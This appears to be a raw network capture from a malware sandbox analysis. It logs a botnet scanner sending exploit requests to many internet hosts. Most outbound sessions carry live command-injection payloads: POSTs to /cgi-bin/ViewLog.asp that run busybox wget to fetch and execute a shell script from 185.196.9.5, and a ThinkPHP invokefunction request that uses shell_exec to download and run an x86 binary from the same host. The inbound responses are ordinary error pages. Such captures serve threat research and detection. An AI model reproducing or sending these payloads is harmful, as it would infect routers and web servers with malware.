Feb 25, 2024 19:03:47.212564945 CET	1286	IN	Data Raw: 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 Data Ascii: loat: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0;
Feb 25, 2024 19:03:47.212583065 CET	1286	IN	Data Raw: 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 Data Ascii: 0vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0us
Feb 25, 2024 19:03:47.212600946 CET	1286	IN	Data Raw: 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 Data Ascii: WfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB
Feb 25, 2024 19:03:47.212620020 CET	1119	IN	Data Raw: 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a Data Ascii: tLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+
Feb 25, 2024 19:03:47.212639093 CET	1286	IN	Data Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to arka.mrservers.net's <a href="mailto:artak.servers
Feb 25, 2024 19:03:47.212656975 CET	348	IN	Data Raw: 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 22 3e 0a Data Ascii: _content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2016 cPan

Session ID	Source IP	Source Port	Destination IP	Destination Port
529	192.168.2.15	46576	31.200.125.157	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:47.018345118 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
530	192.168.2.15	54436	31.200.49.123	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:47.027592897 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
531	192.168.2.15	50446	62.146.26.175	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:47.163727045 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:47.346642971 CET	304	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:47 GMT Server: Apache Content-Length: 126 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
532	192.168.2.15	60368	62.234.184.55	23

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:47.181005001 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 32 36 20 30 32 3a 30 33 3a 34 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.20MAC Address: Server Time: 2024-02-26 02:03:46Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
533	192.168.2.15	38432	94.123.96.36	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:47.249568939 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
534	192.168.2.15	37490	94.123.93.167	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:47.250000000 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
535	192.168.2.15	41128	95.69.192.3	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:47.256321907 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:47.489681959 CET	344	IN	HTTP/1.0 302 Redirect Date: Sun, 25 Feb 2024 18:03:43 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Location: http://185.196.9.5:80/login.htm Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 52 65 64 69 72 65 63 74 3c 2f 48 31 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 6c 6f 67 69 6e 2e 68 74 6d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD></HEAD><BODY><H1>302 Redirect</H1>The document has moved<A HREF="login.htm">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
536	192.168.2.15	39290	95.100.19.248	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:47.331469059 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:47.649956942 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:03:47 GMT Date: Sun, 25 Feb 2024 18:03:47 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 63 66 62 31 33 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 32 32 37 26 23 34 36 3b 31 31 30 37 38 65 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.1cfb1302.1708884227.11078e8</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
537	192.168.2.15	60424	62.234.184.55	23

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:47.804728031 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 32 36 20 30 32 3a 30 33 3a 34 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.20MAC Address: Server Time: 2024-02-26 02:03:46Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
538	192.168.2.15	43410	95.217.246.203	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:48.701078892 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:48.897290945 CET	626	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Sun, 25 Feb 2024 18:03:48 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
539	192.168.2.15	53214	94.122.93.221	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:48.726588011 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
540	192.168.2.15	50840	31.200.64.194	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:48.726691961 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
541	192.168.2.15	60834	94.122.2.185	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:48.730391979 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
542	192.168.2.15	37762	31.200.65.90	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:48.737730026 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
543	192.168.2.15	57990	88.99.43.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:48.849725962 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:49.034055948 CET	106	IN	HTTP/1.1 400 Transfer-Encoding: chunked Date: Sun, 25 Feb 2024 18:03:48 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
544	192.168.2.15	33004	62.171.184.20	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:48.889190912 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
545	192.168.2.15	41992	94.120.110.146	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:48.951842070 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
546	192.168.2.15	33228	31.173.246.243	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:49.196420908 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:49.516547918 CET	381	IN	HTTP/1.1 404 Not Found Date: Mon, 26 Feb 2024 00:56:14 GMT Server: web Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
547	192.168.2.15	53364	112.78.216.60	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:49.298949957 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:49.562839985 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:49 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
548	192.168.2.15	36022	112.74.124.202	80

Timestamp	Bytes transferred	Direction	Data
